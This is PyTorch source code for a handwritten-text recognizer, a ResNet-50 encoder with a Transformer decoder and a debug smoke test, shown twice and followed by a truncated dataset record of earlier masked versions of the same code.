class PositionalEncoding(nn.Module):
    """Fixed sinusoidal position embeddings (Vaswani et al., 2017).

    Holds a (max_len, 1, d_model) buffer and adds its first T rows to a
    (T, B, d_model) input, followed by dropout.
    """

    def __init__(self, d_model, max_len, dropout=0.1):
        super(PositionalEncoding, self).__init__()
        self.dropout = nn.Dropout(p=dropout)
        position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
        freq = torch.exp(torch.arange(0, d_model, 2).float() *
                         (-math.log(10000.0) / d_model))
        table = torch.zeros(max_len, d_model)
        table[:, 0::2] = torch.sin(position * freq)  # even dims: sine
        table[:, 1::2] = torch.cos(position * freq)  # odd dims: cosine
        self.register_buffer('pe', table.unsqueeze(0).transpose(0, 1))

    def forward(self, x):
        """Add encodings for the first x.size(0) positions, then apply dropout."""
        return self.dropout(x + self.pe[:x.size(0), :])
class TransformerHTR(nn.Module):
    """Handwritten-text recognizer: ResNet visual features feeding a
    Transformer decoder that emits character ids autoregressively.

    `alphabet` maps characters plus the specials '<S>', '<E>', '<P>' to
    integer ids; `dict_size` must cover every id in it.
    """

    def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,
        dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,
        text_len=100):
        super(TransformerHTR, self).__init__()
        # NOTE: submodules are created in this exact order; reordering would
        # change state_dict keys and RNG consumption (init reproducibility).
        self.resnet = ResNetFeatures()
        if freeze_resnet:
            print('Freezing-resnet')
            for param in self.resnet.resnet.parameters():
                param.requires_grad = False
        # Projects the flattened (channels * height) axis down to f; assumes
        # the ResNet feature map has height 4 so f*4 matches -- TODO confirm
        # against the input image height used by the dataset.
        self.fc = nn.Linear(f * 4, f)
        self.pe_encode = PositionalEncoding(f, 140, dropout)
        self.fc_bar = nn.Linear(f, f)
        if use_encoder:
            print('Transformer Encoder')
            encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,
                dropout)
            self.transformer_encoder = nn.TransformerEncoder(encoder_layers,
                num_layers)
        else:
            print('Identity encoder')
            self.transformer_encoder = nn.Identity()
        # Registered but not referenced by the visible encode/decode paths.
        self.layer_norm = nn.LayerNorm(f)
        print('freeze-resnet', freeze_resnet)
        print('use_encoder', use_encoder)
        # Text decoder: token embedding + positional encoding + Transformer.
        self.ebl = nn.Embedding(dict_size, f)
        self.pe_decode = PositionalEncoding(f, text_len, dropout)
        decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=
            num_heads, dim_feedforward=f, dropout=dropout)
        self.transformer_decoder = nn.TransformerDecoder(decoder_layer,
            num_layers=num_layers)
        self.linear = nn.Linear(f, dict_size)
        self.f = f
        self.text_len = text_len
        self.alphabet = alphabet
        self.inv_alphabet = {j: i for i, j in alphabet.items()}  # id -> char
        self.init_weights()

    def init_weights(self):
        """Uniformly init projection/embedding weights in [-0.1, 0.1]; zero biases."""
        initrange = 0.1
        self.fc.bias.data.zero_()
        self.fc.weight.data.uniform_(-initrange, initrange)
        self.fc_bar.bias.data.zero_()
        self.fc_bar.weight.data.uniform_(-initrange, initrange)
        self.ebl.weight.data.uniform_(-initrange, initrange)
        self.linear.bias.data.zero_()
        self.linear.weight.data.uniform_(-initrange, initrange)

    def generate_square_subsequent_mask(self, sz):
        """Causal (sz, sz) mask: 0.0 on/below the diagonal, -inf above it."""
        mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
        mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(
            mask == 1, float(0.0))
        return mask

    def encode(self, x):
        """Map an image batch to a (width, batch, f) memory sequence."""
        x = self.resnet(x)
        b, f, h, w = x.size()
        # Fold channels and height together; treat width as sequence length.
        x = x.view(b, f * h, w).permute(0, 2, 1)
        x = self.fc(x)
        x = self.pe_encode(x.permute(1, 0, 2))
        x = self.fc_bar(x)
        x = self.transformer_encoder(x)
        return x

    def decode(self, x, y):
        """Decode target ids x (T, B) against memory y; returns (B, T, dict_size) logits."""
        # Key-padding mask: ignore '<P>' positions in target attention.
        kpm = (x == self.alphabet['<P>']).transpose(1, 0)
        x = self.ebl(x) * math.sqrt(self.f)
        x = self.pe_decode(x)
        dim = x.size()[0]
        a = self.generate_square_subsequent_mask(dim).to(x.device)
        x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)
        return self.linear(x).permute(1, 0, 2)

    def forward(self, x, y):
        """x: target token ids (T, B); y: image batch. Returns decoder logits."""
        return self.decode(x, self.encode(y))

    @torch.no_grad()
    def to_text_(self, x, bulk=True):
        """Map one id sequence to characters.

        bulk=True returns every symbol (specials included) as a list;
        bulk=False stops at '<E>', skips '<S>'/'<P>', and joins to a string.
        """
        txt = []
        p = {self.alphabet['<E>']}
        s = {self.alphabet['<S>'], self.alphabet['<P>']}
        for idx in x:
            if not bulk:
                if idx in p:
                    break
                if idx in s:
                    continue
            txt.append(self.inv_alphabet[idx])
        return txt if bulk else ''.join(txt)

    @torch.no_grad()
    def to_text(self, x, bulk=False):
        """Decode a (B, T) id batch to a list of results, or a single sequence."""
        x = x.cpu().numpy()
        if len(x.shape) == 2:
            return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]
        else:
            return self.to_text_(x, bulk=bulk)

    @torch.no_grad()
    def gen(self, y, bulk=False):
        """Greedy autoregressive decoding of image batch y for text_len steps."""
        y = self.encode(y)
        # Start every row with '<S>'; remaining slots hold '<P>' until filled.
        output_tokens = torch.full((y.size()[1], self.text_len), self.
            alphabet['<P>']).long()
        output_tokens[:, 0] = self.alphabet['<S>']
        output_tokens = output_tokens.to(y.device)
        for j in range(1, self.text_len):
            x = output_tokens[:, :j].permute(1, 0)
            x = self.decode(x, y)
            a = torch.argmax(x, dim=-1)
            output_tokens[:, j] = a[:, -1]
        if bulk:
            return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens
        else:
            return self.to_text(output_tokens)
import os
import torchvision
import numpy as np
from torchvision.transforms.functional import resize, pil_to_tensor
import PIL
def load_batch_image(max_img=2):
    """Stack the numbered debug images into a (max_img, 1, H, W) batch."""
    images = [load_image(os.path.join('debug-data', f'{n}.png'))
              for n in range(1, max_img + 1)]
    return torch.cat(images, dim=0).unsqueeze(1)
# Global character -> index registry; get() mints indices lazily.
character_dict = dict()
def get(x):
    """Return the index assigned to x, minting the next free index on first use."""
    # setdefault evaluates len() before inserting, so new entries receive
    # consecutive indices exactly as the manual lookup-then-insert did.
    return character_dict.setdefault(x, len(character_dict))
# Debug transcriptions ('|' separates words); presumably paired with
# debug-data/1.png and 2.png -- TODO confirm against the dataset.
TXT = ['A|MOVE|to|stop|Mr.|Gaitskell|from',
    'nominating|any|more|Labour|life|Peers']
def load_text_tensor(txt):
    """Encode txt as a (T, 1) LongTensor of ALPHABET ids."""
    ids = [ALPHABET[ch] for ch in load_text(txt)]
    return torch.LongTensor(ids).unsqueeze(1)
def load_batch_text():
    """Concatenate the two debug transcriptions along the batch dimension."""
    columns = [load_text_tensor(line) for line in TXT[:2]]
    return torch.cat(columns, dim=1)
# Smoke test: one forward/backward pass plus greedy generation on debug data.
if __name__ == '__main__':
    transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)
    bt = load_batch_text()  # (T, B) token ids
    print(bt.size())
    # Teacher forcing: feed the full token sequence alongside the images.
    b = transformer(bt[0:transformer.text_len, :], load_batch_image())
    criterion = nn.CrossEntropyLoss()
    loss = 0
    trgt = bt[1:, :]  # targets are the inputs shifted left by one step
    for i in range(trgt.size()[1]):
        loss += criterion(b[i], trgt[:, i])
    loss.backward()
    out = transformer.gen(load_batch_image())
    print(out)
<|reserved_special_token_1|>
import torch
from torch import nn
from torch.nn import functional as F
import torchvision
import math
from torchvision.models.resnet import Bottleneck
from dataset import load_image, load_text, ALPHABET, MAX_LEN
class ResNetFeatures(nn.Module):
    """Truncated ResNet-50 backbone: returns layer3 activations as a compact,
    contextualized visual representation of a handwritten text line.

    Single-channel input is tiled to 3 channels to fit the pretrained stem.
    """

    def __init__(self, pretrained=True):
        super().__init__()
        self.resnet = torchvision.models.resnet50(pretrained=pretrained)

    def forward(self, x):
        net = self.resnet
        # Tile the grayscale channel to RGB, then run the convolutional stem.
        out = net.conv1(x.repeat(1, 3, 1, 1))
        out = net.maxpool(net.relu(net.bn1(out)))
        # Stop after layer3; layer4/avgpool/fc are intentionally unused.
        for stage in (net.layer1, net.layer2, net.layer3):
            out = stage(out)
        return out
class PositionalEncoding(nn.Module):
    """Fixed sinusoidal position embeddings (Vaswani et al., 2017).

    Holds a (max_len, 1, d_model) buffer and adds its first T rows to a
    (T, B, d_model) input, followed by dropout.
    """

    def __init__(self, d_model, max_len, dropout=0.1):
        super(PositionalEncoding, self).__init__()
        self.dropout = nn.Dropout(p=dropout)
        position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
        freq = torch.exp(torch.arange(0, d_model, 2).float() *
                         (-math.log(10000.0) / d_model))
        table = torch.zeros(max_len, d_model)
        table[:, 0::2] = torch.sin(position * freq)  # even dims: sine
        table[:, 1::2] = torch.cos(position * freq)  # odd dims: cosine
        self.register_buffer('pe', table.unsqueeze(0).transpose(0, 1))

    def forward(self, x):
        """Add encodings for the first x.size(0) positions, then apply dropout."""
        return self.dropout(x + self.pe[:x.size(0), :])
class TransformerHTR(nn.Module):
    """Handwritten-text recognizer: ResNet-50 visual encoder + Transformer decoder.

    An image batch is encoded into a sequence of f-dimensional visual
    features (one per horizontal position); an autoregressive Transformer
    decoder then transcribes them into characters from ``alphabet``, a
    char -> id mapping that must contain the special tokens '<S>' (start),
    '<E>' (end) and '<P>' (padding).
    """

    def __init__(self, alphabet, freeze_resnet=False, use_encoder=False, dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1, text_len=100):
        super(TransformerHTR, self).__init__()
        # (Visual Feature) Encoder
        self.resnet = ResNetFeatures()
        if freeze_resnet:
            print('Freezing-resnet')
            for param in self.resnet.resnet.parameters():
                param.requires_grad = False
        # NOTE(review): fc expects channel*height == f*4 after layer3
        # (i.e. a feature-map height of 4) — confirm the input image height.
        self.fc = nn.Linear(f*4, f)
        # 140 = maximum number of horizontal feature positions supported.
        self.pe_encode = PositionalEncoding(f, 140, dropout)
        self.fc_bar = nn.Linear(f, f)
        if use_encoder:
            print('Transformer Encoder')
            encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f, dropout)
            self.transformer_encoder = nn.TransformerEncoder(encoder_layers, num_layers)
        else:
            print('Identity encoder')
            self.transformer_encoder = nn.Identity()
        self.layer_norm = nn.LayerNorm(f)
        print('freeze-resnet', freeze_resnet)
        print('use_encoder', use_encoder)
        # (Text Transcriber) Decoder
        self.ebl = nn.Embedding(dict_size, f)
        self.pe_decode = PositionalEncoding(f, text_len, dropout)
        decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=num_heads, dim_feedforward=f, dropout=dropout)
        self.transformer_decoder = nn.TransformerDecoder(decoder_layer, num_layers=num_layers)
        self.linear = nn.Linear(f, dict_size)
        # General
        self.f = f
        self.text_len = text_len
        self.alphabet = alphabet
        # Inverse mapping id -> char, used when turning predictions into text.
        self.inv_alphabet = {j: i for i, j in alphabet.items()}
        self.init_weights()

    def init_weights(self):
        """Uniformly initialize the projection and embedding layers in [-0.1, 0.1]."""
        initrange = 0.1
        self.fc.bias.data.zero_()
        self.fc.weight.data.uniform_(-initrange, initrange)
        self.fc_bar.bias.data.zero_()
        self.fc_bar.weight.data.uniform_(-initrange, initrange)
        self.ebl.weight.data.uniform_(-initrange, initrange)
        self.linear.bias.data.zero_()
        self.linear.weight.data.uniform_(-initrange, initrange)

    def generate_square_subsequent_mask(self, sz):
        """Return an (sz, sz) causal mask: 0.0 on/below the diagonal, -inf above."""
        mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
        mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
        return mask

    def encode(self, x):
        """Encode an image batch into a (width, batch, f) sequence of visual features."""
        x = self.resnet(x)
        b, f, h, w = x.size()
        # Fold height into the channel axis, then treat width as sequence length.
        x = x.view(b, f*h, w).permute(0, 2, 1)
        # x = F.relu(self.fc(x))
        x = self.fc(x)
        # PositionalEncoding expects (seq, batch, f).
        x = self.pe_encode(x.permute(1, 0, 2))
        # x = F.relu(self.fc_bar(x))
        x = self.fc_bar(x)
        x = self.transformer_encoder(x)
        # x = self.layer_norm(x)
        return x

    def decode(self, x, y):
        """Decode token ids x (seq, batch) against memory y; returns (batch, seq, dict_size) logits."""
        # Key-padding mask so attention ignores '<P>' positions.
        kpm = (x == self.alphabet['<P>']).transpose(1, 0)
        x = self.ebl(x)*math.sqrt(self.f)
        x = self.pe_decode(x)
        dim = x.size()[0]
        # Causal mask: position t may only attend to tokens <= t.
        a = self.generate_square_subsequent_mask(dim).to(x.device)
        x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)
        return self.linear(x).permute(1, 0, 2)

    def forward(self, x, y):
        """Teacher-forced pass: x = target token ids (seq, batch), y = image batch."""
        return self.decode(x, self.encode(y))

    @torch.no_grad()
    def to_text_(self, x, bulk=True):
        """Convert one id sequence to characters.

        With bulk=False, decoding stops at '<E>' and skips '<S>'/'<P>' and a
        joined string is returned; with bulk=True every id is mapped and the
        raw character list is returned.
        """
        txt = []
        p = {self.alphabet["<E>"]}
        s = {self.alphabet["<S>"], self.alphabet["<P>"]}
        for idx in x:
            if not bulk:
                if idx in p:
                    break
                if idx in s:
                    continue
            txt.append(self.inv_alphabet[idx])
        return (txt if bulk else "".join(txt))

    @torch.no_grad()
    def to_text(self, x, bulk=False):
        """Batched to_text_: accepts a (batch, seq) or (seq,) id tensor."""
        x = x.cpu().numpy()
        if len(x.shape) == 2:
            return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]
        else:
            return self.to_text_(x, bulk=bulk)

    @torch.no_grad()
    def gen(self, y, bulk=False):
        """Greedy autoregressive transcription of an image batch y.

        Returns decoded strings, plus the raw token matrix when bulk=True.
        """
        y = self.encode(y)
        # Seed every row with '<S>' followed by '<P>' padding.
        output_tokens = torch.full((y.size()[1], self.text_len), self.alphabet["<P>"]).long()
        output_tokens[:, 0] = self.alphabet["<S>"]
        output_tokens = output_tokens.to(y.device)
        for j in range(1, self.text_len):
            x = output_tokens[:, :j].permute(1, 0)
            x = self.decode(x, y)
            # Greedy choice: take the argmax at the last decoded position.
            a = torch.argmax(x, dim=-1)
            output_tokens[:, j] = a[:,-1]
        if bulk:
            return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens
        else:
            return self.to_text(output_tokens)
# DEBUG
import os
import torchvision
import numpy as np
from torchvision.transforms.functional import resize, pil_to_tensor
import PIL
def load_batch_image(max_img=2):
    """Stack debug images 1..max_img into a single (max_img, 1, H, W) batch."""
    frames = [load_image(os.path.join('debug-data', f"{i}.png"))
              for i in range(1, max_img + 1)]
    # Concatenate along the batch axis, then add the channel dimension.
    return torch.cat(frames, dim=0).unsqueeze(1)
# Global char -> index registry populated lazily by get().
character_dict = dict()


def get(x):
    """Return a stable integer id for *x*, assigning the next free index on first sight.

    The hand-rolled lookup/insert was exactly ``dict.setdefault``:
    ``len(character_dict)`` is evaluated before the key is inserted, so a
    new key receives an id equal to the current registry size.
    """
    return character_dict.setdefault(x, len(character_dict))
# Ground-truth transcriptions matching debug-data/1.png and 2.png.
TXT = ["A|MOVE|to|stop|Mr.|Gaitskell|from", "nominating|any|more|Labour|life|Peers"]


def load_text_tensor(txt):
    """Encode *txt* through the dataset alphabet as a (seq_len, 1) LongTensor column."""
    token_ids = [ALPHABET[ch] for ch in load_text(txt)]
    return torch.LongTensor(token_ids).unsqueeze(1)
def load_batch_text():
    """Batch the two debug transcriptions along dim=1, giving a (seq_len, 2) tensor."""
    columns = [load_text_tensor(TXT[i]) for i in range(2)]
    return torch.cat(columns, dim=1)
if __name__ == "__main__":
    # Smoke test: one teacher-forced forward/backward pass and one greedy
    # generation pass over the two bundled debug samples.
    transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)
    bt = load_batch_text()  # (seq_len, 2) target token ids
    print(bt.size())
    # Teacher forcing: feed the target tokens (truncated to text_len) as decoder input.
    b = transformer(bt[0:transformer.text_len, :], load_batch_image())
    criterion = nn.CrossEntropyLoss()
    loss = 0
    # Shift targets by one position: predict token t+1 from tokens <= t.
    # NOTE(review): b[i] spans the full decoder-input length while trgt drops
    # the first token — confirm the sequence lengths line up as intended.
    trgt = bt[1:, :]
    for i in range(trgt.size()[1]):
        loss += criterion(b[i], trgt[:, i])
    loss.backward()
    out = transformer.gen(load_batch_image())
    print(out)
|
flexible
|
{
"blob_id": "79522db1316e4a25ab5a598ee035cf9b9a9a9411",
"index": 3511,
"step-1": "<mask token>\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.\n log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n <mask token>\n\n\nclass TransformerHTR(nn.Module):\n\n def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,\n dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,\n text_len=100):\n super(TransformerHTR, self).__init__()\n self.resnet = ResNetFeatures()\n if freeze_resnet:\n print('Freezing-resnet')\n for param in self.resnet.resnet.parameters():\n param.requires_grad = False\n self.fc = nn.Linear(f * 4, f)\n self.pe_encode = PositionalEncoding(f, 140, dropout)\n self.fc_bar = nn.Linear(f, f)\n if use_encoder:\n print('Transformer Encoder')\n encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,\n dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers,\n num_layers)\n else:\n print('Identity encoder')\n self.transformer_encoder = nn.Identity()\n self.layer_norm = nn.LayerNorm(f)\n print('freeze-resnet', freeze_resnet)\n print('use_encoder', use_encoder)\n self.ebl = nn.Embedding(dict_size, f)\n self.pe_decode = PositionalEncoding(f, text_len, dropout)\n decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=\n num_heads, dim_feedforward=f, dropout=dropout)\n self.transformer_decoder = nn.TransformerDecoder(decoder_layer,\n num_layers=num_layers)\n self.linear = nn.Linear(f, dict_size)\n self.f = f\n self.text_len = text_len\n self.alphabet = alphabet\n self.inv_alphabet = {j: i for i, j in alphabet.items()}\n self.init_weights()\n\n def 
init_weights(self):\n initrange = 0.1\n self.fc.bias.data.zero_()\n self.fc.weight.data.uniform_(-initrange, initrange)\n self.fc_bar.bias.data.zero_()\n self.fc_bar.weight.data.uniform_(-initrange, initrange)\n self.ebl.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(\n mask == 1, float(0.0))\n return mask\n\n def encode(self, x):\n x = self.resnet(x)\n b, f, h, w = x.size()\n x = x.view(b, f * h, w).permute(0, 2, 1)\n x = self.fc(x)\n x = self.pe_encode(x.permute(1, 0, 2))\n x = self.fc_bar(x)\n x = self.transformer_encoder(x)\n return x\n\n def decode(self, x, y):\n kpm = (x == self.alphabet['<P>']).transpose(1, 0)\n x = self.ebl(x) * math.sqrt(self.f)\n x = self.pe_decode(x)\n dim = x.size()[0]\n a = self.generate_square_subsequent_mask(dim).to(x.device)\n x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)\n return self.linear(x).permute(1, 0, 2)\n\n def forward(self, x, y):\n return self.decode(x, self.encode(y))\n\n @torch.no_grad()\n def to_text_(self, x, bulk=True):\n txt = []\n p = {self.alphabet['<E>']}\n s = {self.alphabet['<S>'], self.alphabet['<P>']}\n for idx in x:\n if not bulk:\n if idx in p:\n break\n if idx in s:\n continue\n txt.append(self.inv_alphabet[idx])\n return txt if bulk else ''.join(txt)\n\n @torch.no_grad()\n def to_text(self, x, bulk=False):\n x = x.cpu().numpy()\n if len(x.shape) == 2:\n return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]\n else:\n return self.to_text_(x, bulk=bulk)\n\n @torch.no_grad()\n def gen(self, y, bulk=False):\n y = self.encode(y)\n output_tokens = torch.full((y.size()[1], self.text_len), self.\n alphabet['<P>']).long()\n output_tokens[:, 0] = self.alphabet['<S>']\n output_tokens = output_tokens.to(y.device)\n for 
j in range(1, self.text_len):\n x = output_tokens[:, :j].permute(1, 0)\n x = self.decode(x, y)\n a = torch.argmax(x, dim=-1)\n output_tokens[:, j] = a[:, -1]\n if bulk:\n return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens\n else:\n return self.to_text(output_tokens)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ResNetFeatures(nn.Module):\n\n def __init__(self, pretrained=True):\n super().__init__()\n self.resnet = torchvision.models.resnet50(pretrained=pretrained)\n\n def forward(self, x):\n x = self.resnet.conv1(x.repeat(1, 3, 1, 1))\n x = self.resnet.bn1(x)\n x = self.resnet.relu(x)\n x = self.resnet.maxpool(x)\n x = self.resnet.layer1(x)\n x = self.resnet.layer2(x)\n x = self.resnet.layer3(x)\n return x\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.\n log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n\n\nclass TransformerHTR(nn.Module):\n\n def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,\n dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,\n text_len=100):\n super(TransformerHTR, self).__init__()\n self.resnet = ResNetFeatures()\n if freeze_resnet:\n print('Freezing-resnet')\n for param in self.resnet.resnet.parameters():\n param.requires_grad = False\n self.fc = nn.Linear(f * 4, f)\n self.pe_encode = PositionalEncoding(f, 140, dropout)\n self.fc_bar = nn.Linear(f, f)\n if use_encoder:\n print('Transformer Encoder')\n encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,\n dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers,\n num_layers)\n else:\n print('Identity encoder')\n self.transformer_encoder = nn.Identity()\n self.layer_norm = nn.LayerNorm(f)\n print('freeze-resnet', freeze_resnet)\n print('use_encoder', use_encoder)\n self.ebl = 
nn.Embedding(dict_size, f)\n self.pe_decode = PositionalEncoding(f, text_len, dropout)\n decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=\n num_heads, dim_feedforward=f, dropout=dropout)\n self.transformer_decoder = nn.TransformerDecoder(decoder_layer,\n num_layers=num_layers)\n self.linear = nn.Linear(f, dict_size)\n self.f = f\n self.text_len = text_len\n self.alphabet = alphabet\n self.inv_alphabet = {j: i for i, j in alphabet.items()}\n self.init_weights()\n\n def init_weights(self):\n initrange = 0.1\n self.fc.bias.data.zero_()\n self.fc.weight.data.uniform_(-initrange, initrange)\n self.fc_bar.bias.data.zero_()\n self.fc_bar.weight.data.uniform_(-initrange, initrange)\n self.ebl.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(\n mask == 1, float(0.0))\n return mask\n\n def encode(self, x):\n x = self.resnet(x)\n b, f, h, w = x.size()\n x = x.view(b, f * h, w).permute(0, 2, 1)\n x = self.fc(x)\n x = self.pe_encode(x.permute(1, 0, 2))\n x = self.fc_bar(x)\n x = self.transformer_encoder(x)\n return x\n\n def decode(self, x, y):\n kpm = (x == self.alphabet['<P>']).transpose(1, 0)\n x = self.ebl(x) * math.sqrt(self.f)\n x = self.pe_decode(x)\n dim = x.size()[0]\n a = self.generate_square_subsequent_mask(dim).to(x.device)\n x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)\n return self.linear(x).permute(1, 0, 2)\n\n def forward(self, x, y):\n return self.decode(x, self.encode(y))\n\n @torch.no_grad()\n def to_text_(self, x, bulk=True):\n txt = []\n p = {self.alphabet['<E>']}\n s = {self.alphabet['<S>'], self.alphabet['<P>']}\n for idx in x:\n if not bulk:\n if idx in p:\n break\n if idx in s:\n continue\n txt.append(self.inv_alphabet[idx])\n return txt if bulk else 
''.join(txt)\n\n @torch.no_grad()\n def to_text(self, x, bulk=False):\n x = x.cpu().numpy()\n if len(x.shape) == 2:\n return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]\n else:\n return self.to_text_(x, bulk=bulk)\n\n @torch.no_grad()\n def gen(self, y, bulk=False):\n y = self.encode(y)\n output_tokens = torch.full((y.size()[1], self.text_len), self.\n alphabet['<P>']).long()\n output_tokens[:, 0] = self.alphabet['<S>']\n output_tokens = output_tokens.to(y.device)\n for j in range(1, self.text_len):\n x = output_tokens[:, :j].permute(1, 0)\n x = self.decode(x, y)\n a = torch.argmax(x, dim=-1)\n output_tokens[:, j] = a[:, -1]\n if bulk:\n return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens\n else:\n return self.to_text(output_tokens)\n\n\n<mask token>\n\n\ndef get(x):\n a = character_dict.get(x, None)\n if a is None:\n idx = len(character_dict)\n character_dict[x] = idx\n return idx\n else:\n return a\n\n\n<mask token>\n\n\ndef load_text_tensor(txt):\n return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ResNetFeatures(nn.Module):\n\n def __init__(self, pretrained=True):\n super().__init__()\n self.resnet = torchvision.models.resnet50(pretrained=pretrained)\n\n def forward(self, x):\n x = self.resnet.conv1(x.repeat(1, 3, 1, 1))\n x = self.resnet.bn1(x)\n x = self.resnet.relu(x)\n x = self.resnet.maxpool(x)\n x = self.resnet.layer1(x)\n x = self.resnet.layer2(x)\n x = self.resnet.layer3(x)\n return x\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.\n log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n\n\nclass TransformerHTR(nn.Module):\n\n def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,\n dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,\n text_len=100):\n super(TransformerHTR, self).__init__()\n self.resnet = ResNetFeatures()\n if freeze_resnet:\n print('Freezing-resnet')\n for param in self.resnet.resnet.parameters():\n param.requires_grad = False\n self.fc = nn.Linear(f * 4, f)\n self.pe_encode = PositionalEncoding(f, 140, dropout)\n self.fc_bar = nn.Linear(f, f)\n if use_encoder:\n print('Transformer Encoder')\n encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,\n dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers,\n num_layers)\n else:\n print('Identity encoder')\n self.transformer_encoder = nn.Identity()\n self.layer_norm = nn.LayerNorm(f)\n print('freeze-resnet', freeze_resnet)\n print('use_encoder', use_encoder)\n self.ebl = 
nn.Embedding(dict_size, f)\n self.pe_decode = PositionalEncoding(f, text_len, dropout)\n decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=\n num_heads, dim_feedforward=f, dropout=dropout)\n self.transformer_decoder = nn.TransformerDecoder(decoder_layer,\n num_layers=num_layers)\n self.linear = nn.Linear(f, dict_size)\n self.f = f\n self.text_len = text_len\n self.alphabet = alphabet\n self.inv_alphabet = {j: i for i, j in alphabet.items()}\n self.init_weights()\n\n def init_weights(self):\n initrange = 0.1\n self.fc.bias.data.zero_()\n self.fc.weight.data.uniform_(-initrange, initrange)\n self.fc_bar.bias.data.zero_()\n self.fc_bar.weight.data.uniform_(-initrange, initrange)\n self.ebl.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(\n mask == 1, float(0.0))\n return mask\n\n def encode(self, x):\n x = self.resnet(x)\n b, f, h, w = x.size()\n x = x.view(b, f * h, w).permute(0, 2, 1)\n x = self.fc(x)\n x = self.pe_encode(x.permute(1, 0, 2))\n x = self.fc_bar(x)\n x = self.transformer_encoder(x)\n return x\n\n def decode(self, x, y):\n kpm = (x == self.alphabet['<P>']).transpose(1, 0)\n x = self.ebl(x) * 